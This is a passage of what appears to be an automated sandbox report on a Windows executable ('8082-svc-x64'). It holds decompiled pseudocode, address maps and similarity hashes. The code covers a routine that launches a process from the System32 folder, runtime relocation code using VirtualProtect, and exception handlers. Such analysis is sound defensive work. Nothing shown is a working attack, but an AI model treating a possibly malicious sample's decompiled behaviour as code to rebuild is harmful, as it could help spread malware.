          				char _v184;
          				intOrPtr _v196;
          				void* _v1232;
          				void* _v2232;
          				void* _v2256;
          				void* _v2264;
          				char _v2276;
          				long long _v2296;
          				long long _v2304;
          				long long _v2312;
          				long long _v2320;
          				intOrPtr _v2328;
          				long long _v2336;
          				int _t22;
          				int _t26;
          				void* _t30;
          				void* _t43;
          				void* _t44;
          				intOrPtr _t51;
          				void* _t71;
          
          				_t51 = __rax;
          				_t45 = __esp;
          				_t44 = __esi;
          				_t40 = __edi;
          				_t71 = __rcx;
          				_t30 = __edx;
          				if(__r8 == 0 ||  *((char*)(__r8)) == 0) {
          					_t22 = GetCurrentProcess();
          					goto L5;
          				} else {
          					r8d = 0x400;
          					_t26 = memset(__edi, 0, 0x1a << 2);
          					_t43 = __edi + 0x1a;
          					_v196 = 0x68;
          					memset(_t43, _t26, 0 << 2);
          					_t45 = __esp + 0x18;
          					_t40 = _t43 + 6;
          					GetEnvironmentVariableA(??, ??, ??);
          					_v2336 = __r8;
          					_snprintf(??, ??, ??);
          					r9d = 0;
          					r8d = 0;
          					_v2296 =  &_v80;
          					_v2304 =  &_v184;
          					_v2312 = 0;
          					_v2320 = 0;
          					_v2328 = 4;
          					_v2336 = 1;
          					_t22 = CreateProcessA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
          					if(_t22 != 0) {
          						_t51 = _v104;
          						L5:
          						if(_t51 != 0) {
          							memcpy(_t40, _t44, 6 << 2);
          							return E00401588(_t44 + 0xc, _t44, _t45 + 0xc, _t51, _t51,  &_v2276, _t71, _t30);
          						}
          					}
          				}
          				return _t22;
          			}

























          0x00401628
          0x00401628
          0x00401628
          0x00401628
          0x0040163a
          0x0040163d
          0x00401642
          0x0040164a
          0x00000000
          0x00401655
          0x0040166c
          0x0040167a
          0x0040167a
          0x0040167f
          0x0040168c
          0x0040168c
          0x0040168c
          0x00401695
          0x004016b4
          0x004016b9
          0x004016bf
          0x004016c2
          0x004016c7
          0x004016cc
          0x004016d9
          0x004016e2
          0x004016eb
          0x004016f3
          0x004016fb
          0x00401703
          0x00401705
          0x0040170d
          0x00401710
          0x00401724
          0x00000000
          0x00401734
          0x00401710
          0x00401703
          0x00401749

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: Process$CreateCurrentEnvironmentVariable_snprintf
          • String ID: %s\System32\%s$h$windir
          • API String ID: 3047511472-1023121253
          • Opcode ID: 131f64c1b2ff6963427ed9f77d07ad06644603e5bda81e9966d56fa131363955
          • Instruction ID: e003f1d9c7db07e131edcd89633c62f6a6acf270d99a59b5c4f71ee12ea20cdc
          • Opcode Fuzzy Hash: 131f64c1b2ff6963427ed9f77d07ad06644603e5bda81e9966d56fa131363955
          • Instruction Fuzzy Hash: C721A162208BC4D2E7208F65F80079AB3A1F788748F844126EF8953B98CF7DC14ACB44
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 234 402530-402547 235 402554-4025ab call 4029a0 call 403100 234->235 236 402549-402553 234->236 235->236 241 4025ad-4025b1 235->241 242 4026a0-4026a6 241->242 243 4025b7-4025bf 241->243 244 4025d1-4025d4 242->244 245 4026ac-4026b3 242->245 243->244 246 4025c1-4025cb 243->246 244->236 249 4025da 244->249 245->244 247 4026b9-4026bf 245->247 246->244 248 402688-402692 246->248 251 4026c5-4026cc 247->251 252 402827-402833 call 402270 247->252 248->247 250 402694-40269b 248->250 253 4025e1-402604 call 4022e0 249->253 250->242 251->236 254 4026d2-4026d9 251->254 262 402606-40260e 253->262 257 4026e3-4026fc 254->257 260 402756-402761 257->260 261 4026fe 257->261 263 402763-402770 260->263 264 402785-402792 260->264 265 402700-402703 261->265 266 402721-402724 261->266 262->236 267 402614-402626 262->267 268 402774-402783 call 4022e0 263->268 264->268 269 402794 264->269 270 4027d9-4027e1 265->270 271 402709-40271c call 402270 265->271 273 40272a-40272d 266->273 274 4027ac-4027b6 266->274 272 402643-402651 267->272 291 402748-40274f 268->291 281 4027f6-4027f9 269->281 282 402796-402799 269->282 270->264 279 4027e3-4027f4 270->279 271->266 275 402630-40263d 272->275 276 402653-402667 VirtualQuery 272->276 273->271 277 40272f-402735 273->277 274->264 278 4027b8-4027c1 274->278 275->236 275->272 284 402809-402822 call 402270 276->284 285 40266d-402686 VirtualProtect 276->285 286 402739-402743 call 4022e0 277->286 287 4027c5-4027d4 call 4022e0 278->287 288 40279b-4027aa call 4022e0 279->288 281->287 289 4027fb-4027fe 281->289 282->288 282->291 284->252 285->275 286->291 287->291 288->291 289->291 295 402804 289->295 291->257 294 402751 291->294 294->262 295->286
          C-Code - Quality: 53%
          			E00402530(int __eax, void* __ebx, void* __rax, void* __rbx, signed char* __rcx, void* __rdi, void* __rsi, signed long long __r8, void* __r12) {
          				void* _v40;
          				char _v44;
          				signed long long _v56;
          				void* _v80;
          				char _v104;
          				int _t45;
          				char _t49;
          				long _t50;
          				signed int _t65;
          				void* _t66;
          				void* _t68;
          				signed int* _t76;
          				signed int _t80;
          				void* _t82;
          				signed char* _t83;
          				intOrPtr* _t86;
          				signed int _t113;
          				void* _t118;
          
          				_t115 = __r12;
          				_t106 = __r8;
          				_t92 = __rdi;
          				_t83 = __rcx;
          				_t68 = __rax;
          				_t45 = __eax;
          				_push(__r12);
          				_push(__rdi);
          				_push(__rsi);
          				_push(__rbx);
          				r12d =  *0x44a350;
          				if(r12d == 0) {
          					 *0x44a350 = 1;
          					E004029A0(__eflags);
          					_t45 = E00403100(_t68);
          					_t80 = 0x447310;
          					 *0x44a360 = 0;
          					 *0x44a358 =  &_v104;
          					__eflags = 0x447310 - 7;
          					if(0x447310 <= 7) {
          						goto L1;
          					} else {
          						__eflags = 0 - 0xb;
          						if(0 <= 0xb) {
          							L17:
          							r9d =  *_t80;
          							__eflags = r9d;
          							if(r9d != 0) {
          								goto L6;
          							} else {
          								r8d =  *(_t80 + 4);
          								__eflags = r8d;
          								if(r8d != 0) {
          									goto L6;
          								} else {
          									goto L19;
          								}
          							}
          						} else {
          							_t65 =  *0x447310; // 0x0
          							__eflags = _t65;
          							if(_t65 != 0) {
          								L6:
          								__eflags = _t80 - 0x447310;
          								if(_t80 >= 0x447310) {
          									goto L1;
          								} else {
          									do {
          										r8d = 4;
          										_t83 =  &(_t83[0x400000]);
          										_t49 =  *_t83 +  *_t80;
          										_t80 = _t80 + 8;
          										_v44 = _t49;
          										_t45 = E004022E0(_t49, _t80, _t83,  &_v44, 0x400000, 0x447310, _t106, _t115, _t118);
          										__eflags = _t80 - 0x447310;
          									} while (_t80 < 0x447310);
          									goto L9;
          								}
          							} else {
          								r11d =  *0x447314; // 0x0
          								__eflags = r11d;
          								if(r11d == 0) {
          									r10d =  *0x447318; // 0x0
          									__eflags = r10d;
          									if(r10d != 0) {
          										L19:
          										__eflags =  *(_t80 + 8) - 1;
          										if( *(_t80 + 8) != 1) {
          											L48:
          											_t86 = "  Unknown pseudo relocation protocol version %d.\n";
          											E00402270(_t45, _t80, _t86, _t88, _t92, 0x447310, _t106, _t113, _t115, _t118);
          											0;
          											0;
          											__eflags =  *_t86 - 0x5a4d;
          											if( *_t86 != 0x5a4d) {
          												L50:
          												asm("repe ret");
          											}
          											_t86 = _t86 +  *((intOrPtr*)(_t86 + 0x3c));
          											__eflags =  *_t86 - 0x4550;
          											if( *_t86 != 0x4550) {
          												goto L50;
          											}
          											__eflags =  *((short*)(_t86 + 0x18)) - 0x20b;
          											_t44 =  *((short*)(_t86 + 0x18)) == 0x20b;
          											__eflags = _t44;
          											return 0 | _t44;
          										} else {
          											_t82 = _t80 + 0xc;
          											__eflags = _t82 - 0x447310;
          											if(_t82 < 0x447310) {
          												do {
          													r8d =  *(_t82 + 8);
          													_t45 = r8b & 0xffffffff;
          													_t88 = _t88 + 0x400000;
          													_t83 =  &(_t83[0x400000]);
          													__eflags = _t45 - 0x10;
          													_t113 =  *_t88;
          													if(__eflags == 0) {
          														r8d =  *_t83 & 0x0000ffff;
          														__eflags = r8d & 0x00008000;
          														if((r8d & 0x00008000) == 0) {
          															goto L35;
          														} else {
          															_t106 = (_t106 | 0xffff0000) - _t88 + _t113;
          															__eflags = _t106;
          															_v56 = _t106;
          															goto L34;
          														}
          													} else {
          														if(__eflags > 0) {
          															L26:
          															__eflags = _t45 - 0x20;
          															if(_t45 == 0x20) {
          																r8d =  *_t83;
          																__eflags = r8d & 0x80000000;
          																if((r8d & 0x80000000) == 0) {
          																	goto L35;
          																} else {
          																	_t106 = (_t106 | 0x00000000) - _t88 + _t113;
          																	__eflags = _t106;
          																	_v56 = _t106;
          																	goto L41;
          																}
          															} else {
          																__eflags = _t45 - 0x40;
          																if(_t45 != 0x40) {
          																	goto L25;
          																} else {
          																	_t113 = _t113 - _t88 +  *_t83;
          																	__eflags = _t113;
          																	_v56 = _t113;
          																	goto L29;
          																}
          															}
          														} else {
          															__eflags = _t45 - 8;
          															if(_t45 == 8) {
          																r8d =  *_t83 & 0x000000ff;
          																__eflags = r8b & 0x00000080;
          																if((r8b & 0x00000080) == 0) {
          																	L35:
          																	_t106 = _t106 - _t88;
          																	_t113 = _t113 + _t106;
          																	__eflags = _t45 - 0x10;
          																	_v56 = _t113;
          																	if(__eflags == 0) {
          																		L34:
          																		_t88 =  &_v56;
          																		r8d = 2;
          																		_t45 = E004022E0(_t45, _t82, _t83, _t88, 0x400000, 0x447310, _t106, 0, _t118);
          																	} else {
          																		if(__eflags > 0) {
          																			__eflags = _t45 - 0x20;
          																			if(_t45 == 0x20) {
          																				L41:
          																				_t88 =  &_v56;
          																				r8d = 4;
          																				_t45 = E004022E0(_t45, _t82, _t83, _t88, 0x400000, 0x447310, _t106, 0, _t118);
          																			} else {
          																				__eflags = _t45 - 0x40;
          																				if(_t45 == 0x40) {
          																					L29:
          																					_t88 =  &_v56;
          																					r8d = 8;
          																					_t45 = E004022E0(_t45, _t82, _t83, _t88, 0x400000, 0x447310, _t106, 0, _t118);
          																				}
          																			}
          																		} else {
          																			__eflags = _t45 - 8;
          																			if(_t45 == 8) {
          																				goto L38;
          																			}
          																		}
          																	}
          																} else {
          																	_t106 = (_t106 | 0xffffff00) - _t88 + _t113;
          																	_v56 = _t106;
          																	L38:
          																	_t88 =  &_v56;
          																	r8d = 1;
          																	_t45 = E004022E0(_t45, _t82, _t83, _t88, 0x400000, 0x447310, _t106, 0, _t118);
          																}
          															} else {
          																L25:
          																_t83 = "  Unknown pseudo relocation bit size %d.\n";
          																_v56 = 0;
          																_t45 = E00402270(_t45, _t82, _t83, _t88, 0x400000, 0x447310, _t106, _t113, 0, _t118);
          																goto L26;
          															}
          														}
          													}
          													_t82 = _t82 + 0xc;
          													__eflags = _t82 - 0x447310;
          												} while (_t82 < 0x447310);
          												L9:
          												__eflags =  *0x44a360;
          												if( *0x44a360 > 0) {
          													_t66 = 0;
          													_t115 = VirtualQuery;
          													_t92 = VirtualProtect;
          													do {
          														_t76 = _t80 +  *0x44a358;
          														__eflags =  *_t76;
          														if( *_t76 == 0) {
          															goto L11;
          														} else {
          															r8d = 0x30;
          															_t88 =  &_v104;
          															_t50 = VirtualQuery(??, ??, ??);
          															__eflags = _t76;
          															if(_t76 == 0) {
          																_t80 = _t80 +  *0x44a358;
          																__eflags = _t80;
          																_t106 =  *(_t80 + 8);
          																_t45 = E00402270(_t50, _t80, "  VirtualQuery failed for %d bytes at address %p",  &_v104, _t92, 0x447310,  *(_t80 + 8), _t113, _t115, _t118);
          																goto L48;
          															} else {
          																_t113 =  &_v44;
          																r8d =  *( *0x44a358 + _t80);
          																_t45 = VirtualProtect(??, ??, ??, ??);
          																goto L11;
          															}
          														}
          														goto L53;
          														L11:
          														_t66 = _t66 + 1;
          														_t80 = _t80 + 0x18;
          														__eflags = _t66 -  *0x44a360;
          													} while (_t66 <  *0x44a360);
          												}
          											}
          											goto L1;
          										}
          									} else {
          										_t80 = 0x44731c;
          										goto L17;
          									}
          								} else {
          									goto L6;
          								}
          							}
          						}
          					}
          				} else {
          					L1:
          					return _t45;
          				}
          				L53:
          			}





















          0x00402530
          0x00402530
          0x00402530
          0x00402530
          0x00402530
          0x00402530
          0x00402534
          0x00402536
          0x00402537
          0x00402538
          0x0040253d
          0x00402547
          0x00402554
          0x0040255e
          0x00402575
          0x00402581
          0x00402588
          0x0040259a
          0x004025a7
          0x004025ab
          0x00000000
          0x004025ad
          0x004025ad
          0x004025b1
          0x004026a0
          0x004026a0
          0x004026a3
          0x004026a6
          0x00000000
          0x004026ac
          0x004026ac
          0x004026b0
          0x004026b3
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x004026b3
          0x004025b7
          0x004025b7
          0x004025bd
          0x004025bf
          0x004025d1
          0x004025d1
          0x004025d4
          0x00000000
          0x004025da
          0x004025e1
          0x004025e8
          0x004025ee
          0x004025f3
          0x004025f5
          0x004025f9
          0x004025fc
          0x00402601
          0x00402601
          0x00000000
          0x004025e1
          0x004025c1
          0x004025c1
          0x004025c8
          0x004025cb
          0x00402688
          0x0040268f
          0x00402692
          0x004026b9
          0x004026bc
          0x004026bf
          0x00402827
          0x00402827
          0x0040282e
          0x00402839
          0x0040283d
          0x00402842
          0x00402847
          0x00402849
          0x00402849
          0x00402849
          0x00402854
          0x00402857
          0x0040285d
          0x00000000
          0x00000000
          0x00402861
          0x00402867
          0x00402867
          0x0040286a
          0x004026c5
          0x004026c5
          0x004026c9
          0x004026cc
          0x004026e3
          0x004026e8
          0x004026ec
          0x004026f0
          0x004026f3
          0x004026f6
          0x004026f9
          0x004026fc
          0x00402756
          0x0040275a
          0x00402761
          0x00000000
          0x00402763
          0x0040276d
          0x0040276d
          0x00402770
          0x00000000
          0x00402770
          0x004026fe
          0x004026fe
          0x00402721
          0x00402721
          0x00402724
          0x004027ac
          0x004027af
          0x004027b6
          0x00000000
          0x004027b8
          0x004027be
          0x004027be
          0x004027c1
          0x00000000
          0x004027c1
          0x0040272a
          0x0040272a
          0x0040272d
          0x00000000
          0x0040272f
          0x00402732
          0x00402732
          0x00402735
          0x00000000
          0x00402735
          0x0040272d
          0x00402700
          0x00402700
          0x00402703
          0x004027d9
          0x004027dd
          0x004027e1
          0x00402785
          0x00402785
          0x00402788
          0x0040278b
          0x0040278e
          0x00402792
          0x00402774
          0x00402774
          0x00402778
          0x0040277e
          0x00402794
          0x00402794
          0x004027f6
          0x004027f9
          0x004027c5
          0x004027c5
          0x004027c9
          0x004027cf
          0x004027fb
          0x004027fb
          0x004027fe
          0x00402739
          0x00402739
          0x0040273d
          0x00402743
          0x00402743
          0x004027fe
          0x00402796
          0x00402796
          0x00402799
          0x00000000
          0x00000000
          0x00402799
          0x00402794
          0x004027e3
          0x004027ed
          0x004027f0
          0x0040279b
          0x0040279b
          0x0040279f
          0x004027a5
          0x004027a5
          0x00402709
          0x00402709
          0x00402709
          0x00402714
          0x0040271c
          0x00000000
          0x0040271c
          0x00402703
          0x004026fe
          0x00402748
          0x0040274c
          0x0040274c
          0x00402606
          0x0040260c
          0x0040260e
          0x00402616
          0x00402618
          0x0040261f
          0x00402643
          0x00402646
          0x0040264f
          0x00402651
          0x00000000
          0x00402653
          0x00402657
          0x0040265d
          0x00402661
          0x00402664
          0x00402667
          0x00402809
          0x00402809
          0x0040281b
          0x00402822
          0x00000000
          0x0040266d
          0x00402674
          0x00402680
          0x00402684
          0x00000000
          0x00402684
          0x00402667
          0x00000000
          0x00402630
          0x00402630
          0x00402633
          0x00402637
          0x00402637
          0x00402643
          0x0040260e
          0x00000000
          0x004026cc
          0x00402694
          0x00402694
          0x00000000
          0x00402694
          0x00000000
          0x00000000
          0x00000000
          0x004025cb
          0x004025bf
          0x004025b1
          0x00402549
          0x00402549
          0x00402553
          0x00402553
          0x00000000

          APIs
          • VirtualQuery.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00401265), ref: 00402661
          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,00401265), ref: 00402684
          Strings
          • Unknown pseudo relocation protocol version %d., xrefs: 00402827
          • Unknown pseudo relocation bit size %d., xrefs: 00402709
          • VirtualQuery failed for %d bytes at address %p, xrefs: 00402509, 0040251A, 00402810
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: Virtual$ProtectQuery
          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
          • API String ID: 1027372294-974437099
          • Opcode ID: 6ed31c0bac4eeb1dfd0b269d04b35f1aeb1cab811be8f1d220e551309a886f30
          • Instruction ID: c454143055e79fd397673f87f084222c0a1c0298268923b062999b768bb8b6f9
          • Opcode Fuzzy Hash: 6ed31c0bac4eeb1dfd0b269d04b35f1aeb1cab811be8f1d220e551309a886f30
          • Instruction Fuzzy Hash: 2B71E4B2710A6486EB10CF65DA4879D3360F305BA8F58462BDE18377D4DBBDC942C709
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 300 401c70-401c7c 301 401cc0-401cc5 300->301 302 401c7e-401c83 300->302 305 401d90 301->305 306 401ccb 301->306 303 401cf0-401cf5 302->303 304 401c85-401c9d signal 302->304 309 401db2-401db9 303->309 310 401cfb 303->310 311 401dc0-401dce signal 304->311 312 401ca3-401cab 304->312 314 401da0-401da5 305->314 307 401d44-401d49 306->307 308 401ccd-401cd2 306->308 307->309 319 401d4b-401d50 307->319 308->309 313 401cd8-401cdd 308->313 310->314 315 401d01-401d06 310->315 316 401cb6-401cbb 311->316 318 401dd4-401de1 call 402c30 311->318 312->316 317 401cad-401cb4 312->317 313->304 320 401cdf-401ce9 313->320 322 401d52-401d65 call 4031c8 314->322 323 401da7-401dac 314->323 315->309 321 401d0c-401d11 315->321 317->316 318->316 319->320 319->322 321->320 325 401d13-401d26 signal 321->325 332 401df7-401e01 signal 322->332 333 401d6b-401d73 322->333 323->309 323->320 330 401de6-401df2 signal 325->330 331 401d2c-401d34 325->331 330->316 331->316 334 401d36-401d3f 331->334 333->316 335 401d79-401d82 333->335 334->316 335->316
          C-Code - Quality: 75%
          			E00401C70(long long* __rax, intOrPtr* __rcx) {
          				intOrPtr _v16;
          				intOrPtr _t3;
          				long long* _t17;
          				long long* _t37;
          				long long* _t38;
          
          				_t35 = __rax;
          				_t3 =  *__rcx;
          				if(_t3 > 0xc0000091) {
          					__eflags = _t3 - 0xc0000094;
          					if(__eflags == 0) {
          						_t17 = 0;
          						goto L3;
          					} else {
          						if(__eflags > 0) {
          							__eflags = _t3 - 0xc0000095;
          							if(_t3 == 0xc0000095) {
          								goto L27;
          							} else {
          								__eflags = _t3 - 0xc0000096;
          								if(_t3 != 0xc0000096) {
          									goto L11;
          								} else {
          									goto L21;
          								}
          							}
          						} else {
          							__eflags = _t3 - 0xc0000092;
          							if(_t3 == 0xc0000092) {
          								goto L27;
          							} else {
          								__eflags = _t3 - 0xc0000093;
          								if(_t3 == 0xc0000093) {
          									goto L2;
          								} else {
          									goto L11;
          								}
          							}
          						}
          					}
          				} else {
          					if(_t3 < 0xc000008d) {
          						__eflags = _t3 - 0xc0000008;
          						if(__eflags == 0) {
          							L27:
          							__eflags = 0;
          							return 0;
          						} else {
          							if(__eflags > 0) {
          								__eflags = _t3 - 0xc000001d;
          								if(_t3 == 0xc000001d) {
          									L21:
          									L004031C8();
          									__eflags = _t35 - 1;
          									_t38 = _t35;
          									if(_t35 == 1) {
          										L004031C8();
          										return 0;
          									}
          									__eflags = _t38;
          									_t4 = 4;
          									if(_t38 != 0) {
          										 *_t38();
          										return 0;
          									}
          									goto L6;
          								} else {
          									__eflags = _t3 - 0xc000008c;
          									if(_t3 != 0xc000008c) {
          										goto L11;
          									} else {
          										goto L27;
          									}
          								}
          							} else {
          								__eflags = _t3 - 0x80000002;
          								if(_t3 == 0x80000002) {
          									goto L27;
          								} else {
          									__eflags = _t3 - 0xc0000005;
          									if(_t3 != 0xc0000005) {
          										L11:
          										return 1;
          									} else {
          										L004031C8();
          										__eflags = __rax - 1;
          										if(__rax == 1) {
          											L004031C8();
          											return 0;
          										}
          										__eflags = __rax;
          										_t4 = 4;
          										if(__rax != 0) {
          											 *__rax();
          											return 0;
          										}
          										goto L6;
          									}
          								}
          							}
          						}
          					} else {
          						L2:
          						_t17 = 1;
          						L3:
          						L004031C8();
          						_t37 = _t35;
          						if(_t35 == 1) {
          							L004031C8();
          							_t4 = 0;
          							__eflags = _t17;
          							if(_t17 != 0) {
          								_v16 = 0;
          								E00402C30(0);
          								return _v16;
          							}
          						} else {
          							_t4 = 1;
          							if(_t37 != 0) {
          								 *_t37();
          								return 0;
          							}
          						}
          						L6:
          						return _t4;
          					}
          				}
          			}








          0x00401c70
          0x00401c75
          0x00401c7c
          0x00401cc0
          0x00401cc5
          0x00401d90
          0x00000000
          0x00401ccb
          0x00401ccb
          0x00401d44
          0x00401d49
          0x00000000
          0x00401d4b
          0x00401d4b
          0x00401d50
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00401d50
          0x00401ccd
          0x00401ccd
          0x00401cd2
          0x00000000
          0x00401cd8
          0x00401cd8
          0x00401cdd
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00401cdd
          0x00401cd2
          0x00401ccb
          0x00401c7e
          0x00401c83
          0x00401cf0
          0x00401cf5
          0x00401db2
          0x00401db2
          0x00401db9
          0x00401cfb
          0x00401cfb
          0x00401da0
          0x00401da5
          0x00401d52
          0x00401d59
          0x00401d5e
          0x00401d62
          0x00401d65
          0x00401dfc
          0x00000000
          0x00401e01
          0x00401d6b
          0x00401d6e
          0x00401d73
          0x00401d7e
          0x00000000
          0x00401d80
          0x00000000
          0x00401da7
          0x00401da7
          0x00401dac
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00401dac
          0x00401d01
          0x00401d01
          0x00401d06
          0x00000000
          0x00401d0c
          0x00401d0c
          0x00401d11
          0x00401cdf
          0x00401ce9
          0x00401d13
          0x00401d1a
          0x00401d1f
          0x00401d26
          0x00401deb
          0x00000000
          0x00401df0
          0x00401d2c
          0x00401d2f
          0x00401d34
          0x00401d3b
          0x00000000
          0x00401d3d
          0x00000000
          0x00401d34
          0x00401d11
          0x00401d06
          0x00401cfb
          0x00401c85
          0x00401c85
          0x00401c85
          0x00401c8a
          0x00401c91
          0x00401c9a
          0x00401c9d
          0x00401dc5
          0x00401dca
          0x00401dcc
          0x00401dce
          0x00401dd4
          0x00401dd8
          0x00000000
          0x00401ddd
          0x00401ca3
          0x00401ca6
          0x00401cab
          0x00401cb2
          0x00000000
          0x00401cb4
          0x00401cab
          0x00401cbb
          0x00401cbb
          0x00401cbb
          0x00401c83

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: signal
          • String ID:
          • API String ID: 1946981877-0
          • Opcode ID: 5519d9f8778c7515352c36e8946173902d582a2b0c9c55cf290954e4f866c631
          • Instruction ID: 7d128fa255b8fe378b3d2b76ca095190f151b34c0f5602ff0362c625f2c5edcd
          • Opcode Fuzzy Hash: 5519d9f8778c7515352c36e8946173902d582a2b0c9c55cf290954e4f866c631
          • Instruction Fuzzy Hash: 6621C1A17681114BFF68927984C472B10429F8C395F29893BDA0AEB3F1EC3CDDC1111E
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 343 402180-40218d 344 4021f0-4021fd 343->344 345 40218f-4021e6 __iob_func fprintf 343->345
          APIs
          Strings
          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 004021B5
          • Unknown error, xrefs: 0040218F
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: __iob_funcfprintf
          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
          • API String ID: 620453056-3474627141
          • Opcode ID: 5664749843ab7f4281eb78d7fc4b5b2173bd09fe0b7de7c35795833e29b1dcce
          • Instruction ID: b61746155111f2d7cc4efb5aad7128311b5069edc69900175d8448b51bc180d4
          • Opcode Fuzzy Hash: 5664749843ab7f4281eb78d7fc4b5b2173bd09fe0b7de7c35795833e29b1dcce
          • Instruction Fuzzy Hash: 29F087B2615B4495DA109F16E940B983BB5F349BDAF684122EF4C13398DB39C683C708
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          • The result is too small to be represented (UNDERFLOW), xrefs: 00402240
          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 004021B5
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: __iob_funcfprintf
          • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
          • API String ID: 620453056-2187435201
          • Opcode ID: 70a5fad4df8da673e74cd78cea4bf351c8c1bad253974bc27c6eb3996130214f
          • Instruction ID: 3fda13f5c3002c01bb56df92233cbde8f7069fc0ec9f327b639105cb1d49328b
          • Opcode Fuzzy Hash: 70a5fad4df8da673e74cd78cea4bf351c8c1bad253974bc27c6eb3996130214f
          • Instruction Fuzzy Hash: B9E039B3214B4095D6109F06E8403987364F348BE9FA80126EF8C177A4CF39C683C708
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Strings
          • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 004021B5
          • Total loss of significance (TLOSS), xrefs: 00402250
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: __iob_funcfprintf
          • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
          • API String ID: 620453056-4273532761
          • Opcode ID: cb24257366d0d8f9c50af8c3a61f50b1c510b386d6eb77aa21932950f34e71e0
          • Instruction ID: ff3a90cd802184d1b37c07242a5d5341b32401a8c00ad52cc69c0c38e6844533
          • Opcode Fuzzy Hash: cb24257366d0d8f9c50af8c3a61f50b1c510b386d6eb77aa21932950f34e71e0
          • Instruction Fuzzy Hash: 7EE039B3214B4095D6109F06E8403987364F348BE9FA80126DF8C277A4CF39C683C708
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
